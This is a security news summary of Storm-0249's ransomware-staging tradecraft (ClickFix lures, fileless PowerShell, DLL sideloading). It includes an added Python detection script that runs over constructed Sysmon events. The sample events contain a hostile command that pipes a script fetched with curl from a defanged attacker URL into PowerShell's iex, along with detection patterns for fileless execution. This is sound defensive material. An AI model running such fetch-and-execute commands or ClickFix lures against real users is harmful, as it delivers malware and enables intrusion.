Storm-0249 pivots to stealthy ransomware tradecraft

December 9, 2025 at 12:00 AM

Storm-0249 is moving beyond its initial-access-broker roots and refining a stealthy toolkit to enable ransomware operations. Recent analysis from ReliaQuest highlights a pivot to domain spoofing, fileless PowerShell, DLL sideloading, and living-off-the-land techniques to quietly infiltrate networks, persist, and evade detection.

Microsoft previously tied Storm-0249 to tax-themed phishing that delivered Latrodectus and the Brute Ratel C4 (BRc4) framework. The actor monetizes footholds by selling access to ransomware and extortion crews, accelerating intrusions across enterprise environments.

Key tactics observed:

  • ClickFix social engineering prompts victims to run commands via the Windows Run dialog under the guise of fixing an issue.
  • The command abuses legitimate "curl.exe" to retrieve a PowerShell script from a fake Microsoft-like URL ("sgcipl[.]com/us.microsoft.com/bdo/") and executes it filelessly.
  • A malicious MSI runs with SYSTEM privileges, dropping a trojanized "SentinelAgentCore.dll" alongside the legitimate "SentinelAgentWorker.exe" in the user’s AppData folder.
  • DLL sideloading ensures the rogue DLL loads when "SentinelAgentWorker.exe" starts, establishing encrypted C2 communications and blending into trusted, signed processes.
  • Built-in Windows tools like "reg.exe" and "findstr.exe" harvest unique system identifiers such as MachineGuid, laying groundwork for follow-on ransomware activity.
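The chain above leaves a characteristic trail in endpoint telemetry: a shell or PowerShell process parented by explorer.exe (how the Run dialog launches commands), a URL whose path impersonates a brand its host does not belong to, PowerShell invoked with in-memory execution switches, reg.exe or findstr.exe touching MachineGuid, and an unsigned DLL loaded from a user-writable directory by the signed executable sitting next to it. The following is an added example, not code from the original write-up or from ReliaQuest or Microsoft: a small rule-based triage pass over constructed Sysmon-style events (Event ID 1 process creation and Event ID 7 image load, using Sysmon's field names). The events, user name, directory paths and rule names are constructed for illustration; the only value taken from the page is the defanged URL.

```python
"""Rule-based triage of Sysmon-style events for the tradecraft described above.
Added example; all events below are constructed sample data, not real telemetry."""
import re
from typing import Dict, List, Tuple

# Constructed sample events. EventID 1 = process creation, 7 = image load.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # ClickFix: victim pastes a command into the Run dialog, so explorer.exe is the parent.
    {"EventID": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "curl.exe -s https://sgcipl[.]com/us.microsoft.com/bdo/ | iex"'},
    # curl.exe fetches the script; the brand name sits in the path, not the host.
    {"EventID": "1", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "curl.exe -s https://sgcipl[.]com/us.microsoft.com/bdo/"},
    # Host fingerprinting with built-in tools.
    {"EventID": "1", "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"reg.exe query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid"},
    {"EventID": "1", "Image": r"C:\Windows\System32\findstr.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "findstr.exe /i MachineGuid"},
    # Sideload candidate: unsigned DLL loaded from AppData by the exe in the same folder.
    {"EventID": "7", "Image": r"C:\Users\alice\AppData\Roaming\SentinelAgent\SentinelAgentWorker.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\SentinelAgent\SentinelAgentCore.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    # Benign controls: a real Microsoft host, and a normal system DLL load.
    {"EventID": "1", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -sS https://www.microsoft.com/en-us/download/confirmation.aspx"},
    {"EventID": "7", "Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
]

URL_RE = re.compile(r"https?://([^/\s\"']+)(/[^\s\"']*)?", re.I)
FILELESS_PS = re.compile(r"\b(iex|invoke-expression|downloadstring|frombase64string)\b|\s-e(nc|ncodedcommand)?\s", re.I)
RUN_DIALOG_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe", "mshta.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def refang(text: str) -> str:
    """Turn defanged indicators (hxxp, [.]) back into parseable URLs."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def lookalike_urls(cmdline: str, brands=("microsoft.com",)) -> List[str]:
    """Hosts that are not the brand but carry the brand name in host or path."""
    hits = []
    for host, path in URL_RE.findall(refang(cmdline)):
        host, path = host.lower(), (path or "").lower()
        for brand in brands:
            is_brand_host = host == brand or host.endswith("." + brand)
            if not is_brand_host and (brand in host or brand in path):
                hits.append(host)
    return hits


def triage_process(ev: Dict[str, str]) -> List[str]:
    img, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    hits = []
    if parent == "explorer.exe" and img in RUN_DIALOG_CHILDREN:
        hits.append("run_dialog_launch")          # Run-dialog / ClickFix pattern
    if lookalike_urls(cmd):
        hits.append("lookalike_url")              # brand spoofed in path or host
    if img in ("powershell.exe", "pwsh.exe") and FILELESS_PS.search(cmd):
        hits.append("fileless_powershell")        # in-memory execution switches
    if img in ("reg.exe", "findstr.exe") and "machineguid" in cmd.lower():
        hits.append("machineguid_harvest")        # host fingerprint collection
    return hits


def triage_image_load(ev: Dict[str, str]) -> List[str]:
    """Flag an unsigned DLL loaded from a user-writable directory by a host
    executable in that same directory (classic sideloading layout)."""
    host_dir, dll_dir = dirname(ev["Image"]), dirname(ev["ImageLoaded"])
    unsigned = ev.get("Signed", "false").lower() != "true"
    if unsigned and host_dir == dll_dir and any(m in dll_dir for m in USER_WRITABLE):
        return ["dll_sideload_candidate"]
    return []


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (process name, matched rules) for every event that trips a rule."""
    findings = []
    for ev in events:
        hits = triage_process(ev) if ev["EventID"] == "1" else triage_image_load(ev)
        if hits:
            findings.append((basename(ev["Image"]), hits))
    return findings


if __name__ == "__main__":
    for name, rules in triage(SAMPLE_EVENTS):
        print(f"{name:28s} {', '.join(rules)}")
```

The two benign events at the end are there to show the rules are shape-based rather than string matches on the campaign: a genuine `www.microsoft.com` download and a system DLL load produce no findings, while the lookalike URL is caught because the brand name appears in the path of a host that is not the brand. In production the sideload rule would also consult the host executable's own signature (Sysmon Event 7 only reports the loaded image's signature) and the allowed install paths for the product being impersonated.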

Why this matters:

  • The campaign shifts from mass phishing to precision operations that weaponize trust in signed and security-branded processes, reducing traditional detection signals.
  • ReliaQuest assesses this is preparation for ransomware affiliates. Groups such as LockBit and ALPHV bind encryption keys to MachineGuid, making decryption impossible without attacker-held keys—even if defenders capture the binary.

Bottom line: Storm-0249 is sharpening its tradecraft to quietly stage ransomware intrusions through trusted processes, fileless execution, and DLL sideloading—making early detection and validation of "trusted" binaries and network egress even more critical.

Source: The Hacker News
